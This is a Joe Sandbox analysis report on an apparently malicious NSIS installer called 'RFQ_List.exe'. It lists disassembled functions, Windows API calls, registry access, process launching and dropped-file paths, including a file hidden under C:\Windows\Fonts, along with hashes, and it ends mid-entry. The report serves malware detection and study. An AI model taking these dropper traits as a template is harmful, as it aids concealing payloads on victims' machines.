Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D8A2,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D8A2,74DF23A0), ref: 0040520F
Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F

Part of subcall function 00405735: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: 202043c5454dda3a880ce226d345d46afecf88c14aec0c9bc18f41e47eb9550b
Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
Opcode Fuzzy Hash: 202043c5454dda3a880ce226d345d46afecf88c14aec0c9bc18f41e47eb9550b
Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D

Function 004015B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ_List.exe"), ref: 00405AC2
Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612

Part of subcall function 00405683: CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes,?,00000000,000000F0), ref: 00401645

Strings

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes, xrefs: 00401638

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes
API String ID: 1892508949-2072545860
Opcode ID: 700f7c9df297e71183510105018fd9ed945753e44605edea45ba797e43a191dd
Instruction ID: 2a65e9898054e9c842dee46b5c7982ab048171bb6952f998b4aca48d6bd22bb3
Opcode Fuzzy Hash: 700f7c9df297e71183510105018fd9ed945753e44605edea45ba797e43a191dd
Instruction Fuzzy Hash: 96119331504504EBCF20BFA4CD4599E36A1EF44368B25093BEA46B62F2DA394A819E5D

Function 00405B11 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062

Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ_List.exe"), ref: 00405AC2
Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF

lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ_List.exe"), ref: 00405B6A
GetFileAttributesW.KERNELBASE(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405B7A

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B11

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3081826266
Opcode ID: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
Instruction ID: 9ab821bc962df094d04e13ee53e7cef05d0bc350337be3d6547239d71e0b1b07
Opcode Fuzzy Hash: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
Instruction Fuzzy Hash: FFF0A429504E5115D72272361D49EBF3669CF86324B1A063FF852B22D1DB3CB952CCBD

Function 00405128 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405157
CallWindowProcW.USER32(?,?,?,?), ref: 004051A8

Part of subcall function 00404165: SendMessageW.USER32(0001042C,00000000,00000000,00000000), ref: 00404177

Strings

, xrefs: 00405138

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69

Function 00405735 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
CloseHandle.KERNEL32(0040A300), ref: 0040576B

Strings

Error launching installer, xrefs: 00405748

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78

Function 00401FC3 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00401FEE

Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D8A2,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D8A2,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D8A2,74DF23A0), ref: 0040520F
Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 8468dde12270efaee3623ef0ee2643c620c6226164998a0f0f0bd77c720df999
Instruction ID: 561ed2f99fcd8f3c69216c61aae9e950b585f3ecd418fa9455324ea25216acba
Opcode Fuzzy Hash: 8468dde12270efaee3623ef0ee2643c620c6226164998a0f0f0bd77c720df999
Instruction Fuzzy Hash: 8221A731900209EBDF20AF65CE48A9E7E71BF00354F20427BF510B51E1CBBD8A81DA5D

Function 00401B37 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 00401BA7
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BB9

Strings

C:\Windows\Fonts\sipunculid.gra, xrefs: 00401B5E, 00401B64, 00401B7E

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: Global$AllocFree
String ID: C:\Windows\Fonts\sipunculid.gra
API String ID: 3394109436-1058031894
Opcode ID: daf19240af0bec5427d7d75aebbddc3e58b55c9256abfd3c92eb23101e06bf00
Instruction ID: 27804974e3ca03393c04398de70bc6092cde1ed56c9d8f76027c1228d60f226a
Opcode Fuzzy Hash: daf19240af0bec5427d7d75aebbddc3e58b55c9256abfd3c92eb23101e06bf00
Instruction Fuzzy Hash: 32219072600101EBCB10EFA4CE85E5F77BAAF45324725413BF116B32D1DA78A8519B1D

Function 0040249E Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
RegCloseKey.ADVAPI32(?,?,?,Copy to C:\Users\Public\Desktop\Bardehvalers.unw,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: 52b1034902b6533bd2d6d50c47519d0e0d132e6ce1eb16c8f111a809d007a761
Instruction ID: caa0a88e983a87845293d3a09aded013c5498a2120ee6ea3f3930af667db2d56
Opcode Fuzzy Hash: 52b1034902b6533bd2d6d50c47519d0e0d132e6ce1eb16c8f111a809d007a761
Instruction Fuzzy Hash: 9FF08171A00204ABEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69

Function 0040242A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040245B
RegCloseKey.ADVAPI32(?,?,?,Copy to C:\Users\Public\Desktop\Bardehvalers.unw,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: e8cdc2980028b670d4ddc5f3186f10a85cd29f3b4eedee526efe3e64a1379a7a
Instruction ID: 28617f4b1a8802b5017de0243b5a45cf97da40b04a50325282b533cdbf166070
Opcode Fuzzy Hash: e8cdc2980028b670d4ddc5f3186f10a85cd29f3b4eedee526efe3e64a1379a7a
Instruction Fuzzy Hash: 64115E31911205EBDB14CFA4DA489AEB7B4EF44354B20843FE446B72D0DAB89A41EB59

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
Instruction ID: cd3aabbb77ee63ed71f9921c47df44d3aa6e588553b0b950a072bc92d791a3e5
Opcode Fuzzy Hash: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
Instruction Fuzzy Hash: 2101F4316202209FE7095B389D05B6A3698E710319F10863FF851F62F1DA78DC428B4C

Function 0040231F Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
RegCloseKey.ADVAPI32(00000000), ref: 00402347

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: 45e7bfa75de394aabc60a00221bac3dee61c605efc9a99c65b382dbe1571e612
Instruction ID: c2222f3894d46b01c01a36c2377af854b7dcf2fa525412944523e76cc0079291
Opcode Fuzzy Hash: 45e7bfa75de394aabc60a00221bac3dee61c605efc9a99c65b382dbe1571e612
Instruction Fuzzy Hash: 2DF04F32A04110ABEB11BFB59B4EABE72699B80314F15803BF501B71D5D9FC99015629

Function 0040642B Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
GetProcAddress.KERNEL32(00000000,?), ref: 00406458

Part of subcall function 004063BF: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
Part of subcall function 004063BF: wsprintfW.USER32 ref: 00406411
Part of subcall function 004063BF: LoadLibraryW.KERNELBASE(?), ref: 00406421

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
Instruction ID: 5d7b52194fecd52e31197542c52f699420a2dcfb6f4997f05ddeecd74f4f3bdc
Opcode Fuzzy Hash: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
Instruction Fuzzy Hash: 70E0863660422066D61057705E44D3763AC9E94704306043EFA46F2041DB78DC32AA6E

Function 00401DDC Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
EnableWindow.USER32(00000000,00000000), ref: 00401DFD

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: e1b0357d7dd7ae1d86e72c14d3f4c1d25802a01c5ec69123f4cd8e600442627b
